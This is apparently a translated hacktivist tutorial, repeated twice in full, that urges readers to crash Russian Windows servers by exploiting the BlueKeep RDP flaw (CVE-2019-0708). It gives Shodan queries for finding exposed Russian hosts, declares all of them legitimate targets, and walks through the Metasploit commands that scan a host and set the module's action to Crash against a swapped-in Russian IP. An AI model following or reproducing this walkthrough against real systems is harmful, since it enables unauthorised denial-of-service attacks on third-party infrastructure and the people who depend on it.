Добро пожаловать обратно, мои начинающие кибервоины!
Жестокое вторжение Путина на Украину должно быть остановлено. Пока украинцы терпят бомбёжки и живут без тепла и электричества, те из нас, кто обладает навыками и знаниями, обязаны делать всё возможное, работая в тёплых, уютных офисах и домах. Помните: Путин не остановится на Украине!
Уязвимость Bluekeep
В мае 2019 года была объявлена новая уязвимость безопасности в операционной системе Windows, созданной на основе Windows NT (Windows 2000, XP, Windows Vista, Windows 7, Server 2000, Server 2003 и Server 2008), которая эксплуатирует переполнение кучи в службе RDP этих операционных систем. Уязвимости присвоено обозначение CVE-2019-0708. Эта уязвимость относится к числу наиболее опасных, поскольку позволяет злоумышленнику удалённо выполнить код в системе. В некоторых случаях, если удалённый код не выполняется, это может привести к появлению на целевых системах опасного синего экрана смерти (BSOD), фактически вызывая отказ в обслуживании (DoS).
В России есть несколько таких систем, подключенных к интернету. Мы можем легко найти их, используя Shodan, выполнив поисковый запрос:
страна:ru порт:3389 ос:”windows 7″
страна:ru порт:3389 ос:”windows server 2008″
Shodan находит 281 систему под управлением Windows 7 и 272 системы под управлением Windows Server 2008. Все эти цели являются законными.
Механизм Bluekeep
Протокол RDP использует виртуальные каналы в качестве пути передачи данных между клиентом и сервером. Это взаимодействие происходит до аутентификации. Существует вероятность повреждения кучи, что позволит выполнить произвольный код с системными привилегиями. Я обнаружил, что это происходит редко, но синий экран смерти возникает практически всегда.
Исследователи безопасности Rapid 7 опубликовали эксплойт для этой уязвимости в сентябре 2019 года.
Шаг №1 : Найдите Bluekeep в Metasploit
Первый шаг — запустить Metasploit в Kali или любой другой платформе для атак.
Теперь найдите эксплойт Bluekeep.
msf5> поиск bluekeep
Как видите, есть два модуля с ключевым словом bluekeep в названии. Давайте выберем вспомогательный модуль для аварийного завершения работы сервера.
msf5> использовать вспомогательный/сканер/rdp/cve_2019_0708_bluekeep
Затем укажите удалённый хост или IP-адрес целевого устройства. Выберите один из IP-адресов, найденных в Shodan. Для демонстрации я использую систему Windows 7 в своей лабораторной сети.
msf > set RHOSTS 192.168.1.101 ( замените на IP российского сервера )
msf> запустить
Как видите, этот модуль обнаружил, что сервер уязвим.
На последнем этапе нам нужно установить ДЕЙСТВИЕ на Сбой.
msf5 > set ACTION Crash
msf5 > запустить
Как видите, Metasploit сообщает, что система дала сбой! Отличная работа!
При запуске нашей системы Windows 7 мы видим синий экран смерти (BSOD).
Краткое содержание:
Жестокое вторжение России на Украину вынуждает каждого из нас сделать всё возможное, чтобы помочь. Как хакеры, мы обладаем навыками, позволяющими вывести из строя цифровую инфраструктуру России. Хотя эта атака не сработает против всех систем в России, не обязательно выводить из строя каждую из них, достаточно вывести из строя хотя бы одну. Нас, работающих против России, более 200 000. Даже если каждый из нас сделает хоть немного, последствия будут разрушительными!
ОстановитеПутинаСейчас!
Жестокое вторжение Путина на Украину должно быть остановлено. Пока украинцы терпят бомбёжки и живут без тепла и электричества, те из нас, кто обладает навыками и знаниями, обязаны делать всё возможное, работая в тёплых, уютных офисах и домах. Помните: Путин не остановится на Украине!
Уязвимость Bluekeep
В мае 2019 года была объявлена новая уязвимость безопасности в операционной системе Windows, созданной на основе Windows NT (Windows 2000, XP, Windows Vista, Windows 7, Server 2000, Server 2003 и Server 2008), которая эксплуатирует переполнение кучи в службе RDP этих операционных систем. Уязвимости присвоено обозначение CVE-2019-0708. Эта уязвимость относится к числу наиболее опасных, поскольку позволяет злоумышленнику удалённо выполнить код в системе. В некоторых случаях, если удалённый код не выполняется, это может привести к появлению на целевых системах опасного синего экрана смерти (BSOD), фактически вызывая отказ в обслуживании (DoS).
В России есть несколько таких систем, подключенных к интернету. Мы можем легко найти их, используя Shodan, выполнив поисковый запрос:
страна:ru порт:3389 ос:”windows 7″
страна:ru порт:3389 ос:”windows server 2008″
Shodan находит 281 систему под управлением Windows 7 и 272 системы под управлением Windows Server 2008. Все эти цели являются законными.
Механизм Bluekeep
Протокол RDP использует виртуальные каналы в качестве пути передачи данных между клиентом и сервером. Это взаимодействие происходит до аутентификации. Существует вероятность повреждения кучи, что позволит выполнить произвольный код с системными привилегиями. Я обнаружил, что это происходит редко, но синий экран смерти возникает практически всегда.
Исследователи безопасности Rapid 7 опубликовали эксплойт для этой уязвимости в сентябре 2019 года.
Шаг №1 : Найдите Bluekeep в Metasploit
Первый шаг — запустить Metasploit в Kali или любой другой платформе для атак.
Теперь найдите эксплойт Bluekeep.
msf5> поиск bluekeep
Как видите, есть два модуля с ключевым словом bluekeep в названии. Давайте выберем вспомогательный модуль для аварийного завершения работы сервера.
msf5> использовать вспомогательный/сканер/rdp/cve_2019_0708_bluekeep
Затем укажите удалённый хост или IP-адрес целевого устройства. Выберите один из IP-адресов, найденных в Shodan. Для демонстрации я использую систему Windows 7 в своей лабораторной сети.
msf > set RHOSTS 192.168.1.101 ( замените на IP российского сервера )
msf> запустить
Как видите, этот модуль обнаружил, что сервер уязвим.
На последнем этапе нам нужно установить ДЕЙСТВИЕ на Сбой.
msf5 > set ACTION Crash
msf5 > запустить
Как видите, Metasploit сообщает, что система дала сбой! Отличная работа!
При запуске нашей системы Windows 7 мы видим синий экран смерти (BSOD).
Краткое содержание:
Жестокое вторжение России на Украину вынуждает каждого из нас сделать всё возможное, чтобы помочь. Как хакеры, мы обладаем навыками, позволяющими вывести из строя цифровую инфраструктуру России. Хотя эта атака не сработает против всех систем в России, не обязательно выводить из строя каждую из них, достаточно вывести из строя хотя бы одну. Нас, работающих против России, более 200 000. Даже если каждый из нас сделает хоть немного, последствия будут разрушительными!
ОстановитеПутинаСейчас!